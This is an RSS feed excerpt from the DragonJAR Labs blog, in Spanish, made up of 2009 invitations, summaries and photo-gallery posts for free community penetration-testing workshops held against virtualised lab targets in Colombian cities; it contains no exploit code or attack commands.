<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Labs DragonJAR &#187; DragoNLab-HackTaller</title>
	<atom:link href="http://labs.dragonjar.org/tag/dragonlab-hacktaller/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<lastBuildDate>Sun, 06 Jun 2010 10:34:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Registro Fotográfico del HackLab 10 Medellín &#8211; PenTest</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hacklab-10-medellin-pentest</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hacklab-10-medellin-pentest#comments</comments>
		<pubDate>Mon, 07 Sep 2009 15:24:56 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[HackLabs]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=849</guid>
		<description><![CDATA[Como siempre no queda más que agradecer a tod@s los asistentes de este 10° HackLab realizado en la ciudad de Medellín. Como especifiqué en la invitación, el HackLab se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y una segunda sección dedicada al Test de Pentración como tal, a [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Como siempre no queda más que agradecer a tod@s los asistentes de este 10° HackLab realizado en la ciudad de Medellín.</p>
<p style="text-align: justify;"><img class="aligncenter" title="HackLab 10 - Medellín" src="http://lh3.ggpht.com/_NXAlE1z-EjY/SqUYrpbfz0I/AAAAAAAAAuk/l4AtswoI7Mo/hacklab10.jpg" alt="" width="450" height="220" /></p>
<p style="text-align: justify;">Como especifiqué en la invitación, el HackLab se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y una segunda sección dedicada al Test de Pentración como tal, a un entorno virtualizado de intrusión.</p>
<p style="text-align: justify;">Dejo a continuación el enlace al registro fotográfico del evento.</p>
<p style="text-align: justify;"><a href="http://picasaweb.google.com/4v4t4r/HackLab10Medellin#" target="_blank"><strong>Registro fotográfico del HackLab 10 en Medellín &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hacklab-10-medellin-pentest/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>HackLab 10 Medellín &#8211; PenTest</title>
		<link>http://labs.dragonjar.org/hacklab-10-medellin-pentest</link>
		<comments>http://labs.dragonjar.org/hacklab-10-medellin-pentest#comments</comments>
		<pubDate>Wed, 02 Sep 2009 07:59:20 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=845</guid>
		<description><![CDATA[Extiendo la invitación a todos los interesados en participar de este 10° HackLab a realizarse en la ciudad de Medellín el próximo sábado 5 de septiembre de 2009. El HackLab será llevado a cabo en dos secciones. Un primera sección cubrirá algunas definiciones de  varias temáticas relacionadas con los Test de Penetración y la segunda [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo la invitación a todos los interesados en participar de este 10° HackLab a realizarse en la ciudad de Medellín el próximo sábado 5 de septiembre de 2009.</p>
<p style="text-align: justify;">El HackLab será llevado a cabo en dos secciones. Un primera sección cubrirá algunas definiciones de  varias temáticas relacionadas con los Test de Penetración y la segunda sección constrará de una práctica de realización de un PenTest a un sistema virtualizado de intrusión.</p>
<p style="text-align: justify;">El escenario propuesto es el siguiente:</p>
<p style="text-align: justify;">Un empresa dedicada al servicio de Webhosting te contrata para realizar un Test de Penetración en uno de sus servidores dedicados a la administración de sus sistemas. Dicho servidor se encuentra en una de sus  redes xxx.xxx.xxx.xxx. El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y penetrar el sistema.</p>
<p style="text-align: justify;">El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el Hack Lab, el proceso de inscripción se completa, luego de que yo responda dicho e-mail confirmándole la disponiblidad del cupo.</p>
<p style="text-align: justify;"><strong>4v4t4r @ gmail . com</strong></p>
<p style="text-align: justify;">Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p style="text-align: justify;">- <strong>Mekato (más que indispensable&#8230; mejor no vaya si no me lleva mekatos XD)<br />
</strong>- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
<strong>- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;) INDISPENSABLE!!!<br />
</strong>- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias).<br />
<strong>- Más mekatos</strong><br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p style="text-align: justify;">- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p style="text-align: justify;"><strong>Fecha:</strong> Sabado 5 de septiembre de 2009<br />
<strong>Hora:</strong> 2:30 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p style="text-align: justify;"><strong>Repito:</strong> <strong>Solo pueden asistir las personas que confirmen asistencia</strong> (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), lo hago de esta manera para garantizar de que todos estén cómodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
<strong>Aclaro también y pongo a disposición sobre quienes tengan laptops y quieran llevarlo. Allá le hago el espacio y aprende con todos.</strong> De esta manera tenemos un espacio extra para otro interesado.<br />
Les recuerdo nuevamente que estos HackLabs <strong>NO</strong> tienen ningún costo.</p>
<p style="text-align: justify;">
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacklab-10-medellin-pentest/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Resumen del HackLab de la comunidad realizado en la ciudad de Bucaramanga</title>
		<link>http://labs.dragonjar.org/resumen-del-hacklab-de-la-comunidad-realizado-en-la-ciudad-de-bucaramanga</link>
		<comments>http://labs.dragonjar.org/resumen-del-hacklab-de-la-comunidad-realizado-en-la-ciudad-de-bucaramanga#comments</comments>
		<pubDate>Fri, 29 May 2009 17:12:20 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Bucaramanga]]></category>
		<category><![CDATA[HackLabs]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=793</guid>
		<description><![CDATA[El pasado 23 de mayo se llevó a cabo el primer HackLab: Laboratorio de Hacking / Técnicas y Contramedidas en la ciudad de Bucaramanga. Dicho HackLab contó con la participación de algunos integrantes de la Comunidad e interesados en estas temáticas. El HackLab fue gestionado y dirigido por Angelus_7722 y BadCode, quienes participan activamente en [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El pasado 23 de mayo se llevó a cabo el primer HackLab: Laboratorio de Hacking / Técnicas y Contramedidas en la ciudad de Bucaramanga. Dicho HackLab contó con la participación de algunos integrantes de la Comunidad e interesados en estas temáticas.</p>
<p style="text-align: justify;"><img class="aligncenter" title="hackLab Bucaramanga" src="http://img11.imageshack.us/img11/5703/hacklabbucara.jpg" alt="" width="500" height="375" /></p>
<p style="text-align: justify;">El HackLab fue gestionado y dirigido por <a href="http://comunidad.dragonjar.org/members/angelus_7722.html" target="_blank"><strong>Angelus_7722</strong></a> y <a href="http://comunidad.dragonjar.org/members/badcode.html" target="_blank"><strong>BadCode</strong></a>, quienes participan activamente en la Comunidad DragonJAR.</p>
<p style="text-align: justify;">A continuación el primer video tutorial de desarrollo de este Laboratorio. En el aprenderemos y conoceremos sobre el entorno utilizado en este laboratorio, y como podemos comenzar con el montaje e importación de las máquinas atacantes y objetivo.</p>
<p style="text-align: justify;"><img class="aligncenter" title="Video" src="http://img25.imageshack.us/img25/1103/videoeum.jpg" alt="" width="500" height="375" /><a href="http://www.4shared.com/file/108576400/30fe4097/HackLab_Bucaramanga_Video_I_DragonJARorg.html" target="_blank"><strong>Descargar video tutorial</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
<p style="text-align: justify;">Para más información sobre el desarrollo de este laboratorio y la configuración de los ambientes virtuales visita el <a href="http://comunidad.dragonjar.org/laboratorios/7555-resumen-1er-lab-bucaramanga-practica-1-a.html" target="_blank">foro de resumen&gt;&gt;.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/resumen-del-hacklab-de-la-comunidad-realizado-en-la-ciudad-de-bucaramanga/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Registro Fotográfico del HackTaller 09 Medellín &#8211; PenTest / BackTrack 4</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4#comments</comments>
		<pubDate>Tue, 17 Mar 2009 01:35:51 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=670</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Como siempre no queda más que agradecer a tod@s los asistentes de este 9° HackTaller realizado en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="HackLab 09 en Medellín" src="http://img16.imageshack.us/img16/5097/hacklab09.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;">Muchas gracias a todos por el mekato que me llevaron&#8230; aunque ya se me acabó XD.</p>
<p style="text-align: justify;"><span id="more-670"></span>Como especifiqué en la invitación, el HackTaller se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y BackTrack 4 y una segunda sección dedicada al Test de Pentración como tal a un entorno virtualizado de intrusión.</p>
<p style="text-align: justify;">Dejo a continuación los enlaces al registro fotográfico del evento.</p>
<p style="text-align: justify;"><a href="http://picasaweb.google.es/4v4t4r/HackLab09EnMedellin" target="_blank"><strong>Registro fotográfico del HackLab 09 en Medellín &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><a href="http://picasaweb.google.es/4v4t4r/HackLab09EnMedellin#slideshow" target="_blank"><strong>Registro fotográfico del HackLab 09 en Medellín en modo presentación &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>HackTaller 09 Medellín &#8211; PenTest / BackTrack 4</title>
		<link>http://labs.dragonjar.org/hacktaller-09-medellin-pentest-backtrack-4</link>
		<comments>http://labs.dragonjar.org/hacktaller-09-medellin-pentest-backtrack-4#comments</comments>
		<pubDate>Fri, 13 Mar 2009 05:20:13 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Hacking Ético]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=667</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo la invitación a todos los interesados en participar de este 9° HackTaller a realizarse en la ciudad de Medellín.</p>
<p style="text-align: justify;">El Hack Lab estará divido en dos secciones. Una primera sección en la cual haré algunos demos de uso y configuración de BackTrack 4 Beta y algunos ejercicios prácticos a desarrollar por cada uno de los participantes.</p>
<p style="text-align: justify;"><span id="more-667"></span>La segunda sección cubrirá un Test de Penetración a un sistema virtualizado de intrusión. El escenario propuesto es el siguiente:</p>
<p style="text-align: justify;">Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.1.xxx). El servidor a auditar permite que los usuarios y administradores almacenen archivos por medio de un servidor FTP. El trabajo consiste en descubrir las vulnerabilidades existentes en dicho servidor, intentando con todos los tipos de ataques que estén a su disposición.</p>
<p style="text-align: justify;">Demostrar que el sistema es vulnerable sería la mejor manera de concientizar, pues desde allí se pueden implementar mejores prácticas en materia de seguridad Informática en la empresa.</p>
<p style="text-align: justify;">El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el Hack Lab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmándole la disponiblidad del espacio.</p>
<p style="text-align: justify;"><strong>4v4t4r @ gmail . com</strong></p>
<p style="text-align: justify;">Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p style="text-align: justify;">- <strong>Mekato (más que indispensable&#8230; mejor no vaya si no me lleva mekatos XD)<br />
</strong>- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
<strong>- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;) INDISPENSABLE!!!<br />
</strong>- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias).<br />
<strong>- Más mekatos</strong><br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p style="text-align: justify;">- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p style="text-align: justify;"><strong>Fecha:</strong> Sabado 14 de marzo de 2009<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p style="text-align: justify;"><strong>Repito:</strong> <strong>Solo pueden asistir las personas que confirmen asistencia</strong> (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), lo hago de esta manera para garantizar de que todos estén cómodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-09-medellin-pentest-backtrack-4/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Registro Fotográfico del 2do Hack Lab en Pereira</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-2do-hack-lab-en-pereira</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-2do-hack-lab-en-pereira#comments</comments>
		<pubDate>Wed, 11 Mar 2009 06:27:17 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pereira]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=644</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El pasado sabado 7 de marzo se llevo a cabo el segundo hack lab en la ciudad de pereira. Dejo a continuación el registro fotográfico y el enlace para más información sobre el laboratorio, además de la presentación expuesta por <a href="http://www.exactlimon.com/" target="_blank"><strong>exactlimon</strong></a> sobre <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank"><strong>banner identification</strong></a>.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hack Lab Pereira" src="http://img16.imageshack.us/img16/6087/hacklabpereira.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;"><a href="http://anonym-url.com/go.php?to=http://www.fileden.com/files/2007/7/17/1274922/DragonJAR/Laboratorios%20Hacking-%20identificaicon%20de%20banners.pps" target="_blank"><strong>Descargar presentación expuesta sobre Banner Identification</strong></a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/laboratorios/7056-resumen-del-2do-lab-en-pereira.html" target="_blank"><strong>Más información y comentarios acerca del Hack Lab 02 en Pereira</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-2do-hack-lab-en-pereira/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Registro Fotográfico del Hack Lab 08 en Medellín</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin#comments</comments>
		<pubDate>Mon, 23 Feb 2009 19:24:09 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=631</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Como siempre muchas gracias a las personas que asistieron a este 8° Hack Lab en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hack Lab 08 en Medellín" src="http://img404.imageshack.us/img404/7732/hacklab08web.jpg" alt="" width="450" height="338" /></p>
<p>Próximamente estaré publicando todo el material utilizado en este HackTaller, incluyendo los videos, herramientas y entornos virtualizados de intrusión.</p>
<p>Pretendo también realizar este Hack Lab en modo virtual para permitirles a las personas interesadas de otras regiones la participación activa de este tipo de eventos.</p>
<p><a href="http://img26.imageshack.us/slideshow/player.php?id=img26/9690/1235412890qup.smil" target="_blank"><strong>A continuación dejo el registro fotográfico del evento.</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>HackTaller 08 Medellín &#8211; PenTest (Repetición)</title>
		<link>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion</link>
		<comments>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion#comments</comments>
		<pubDate>Thu, 19 Feb 2009 07:48:05 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=620</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo nuevamente la invitación a todos los interesados en participar de este 8° HackTaller a realizarse en la ciudad de Medellín.</p>
<p style="text-align: justify;">La idea es que a este Hack Lab puedan asistir las personas que se quedaron sin cupo en el anterior o que por uno u otro motivo no pudieron asistir.</p>
<p style="text-align: justify;">La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.</p>
<p style="text-align: justify;">El escenario propuesto para este Test de Penetración es el siguiente:</p>
<p style="text-align: justify;">Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p style="text-align: justify;">El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.</p>
<p style="text-align: justify;"><strong>4v4t4r @ gmail . com</strong></p>
<p style="text-align: justify;">Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p style="text-align: justify;">- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (<a href="http://174.36.1.2/bt3.7z">Descargar imágen de máquina virtual BackTrack 3</a>)<br />
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
<strong> &#8211; Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;) INDISPENSABLE!!!</strong><br />
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)<br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p style="text-align: justify;">- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p style="text-align: justify;"><strong>Fecha:</strong> Sabado 21 de Febrero de 2008<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p style="text-align: justify;"><strong>Repito:</strong> Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Registro fotográfico del Hack Lab 07 en Medellín</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-07-en-medellin</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-07-en-medellin#comments</comments>
		<pubDate>Tue, 17 Feb 2009 00:14:54 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=581</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El pasado sábado 14 de febrero se realizó el 7° Hack Lab en la ciudad de Medellín.</p>
<div align="center"><img alt="" src="http://img4.imageshack.us/img4/3719/hacklab07us0.jpg" title="Hack Lab 07 en Medellín" class="aligncenter" width="350" height="292" /></div>
<p>Para este Hack Lab se presentó el siguiente escenario de Test de Penetración:</p>
<p>Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p>Dejo a continuación el registro fotográfico de este evento.</p>
<p><strong><a href="http://picasaweb.google.com/4v4t4r/HackLab07EnMedellin#">Ver galería >></a></strong><br />
<strong><a href="http://picasaweb.google.com/4v4t4r/HackLab07EnMedellin?feat=embedwebsite#slideshow/5303532603122913362">Ver galería en modo de presentación >></a></strong></p>
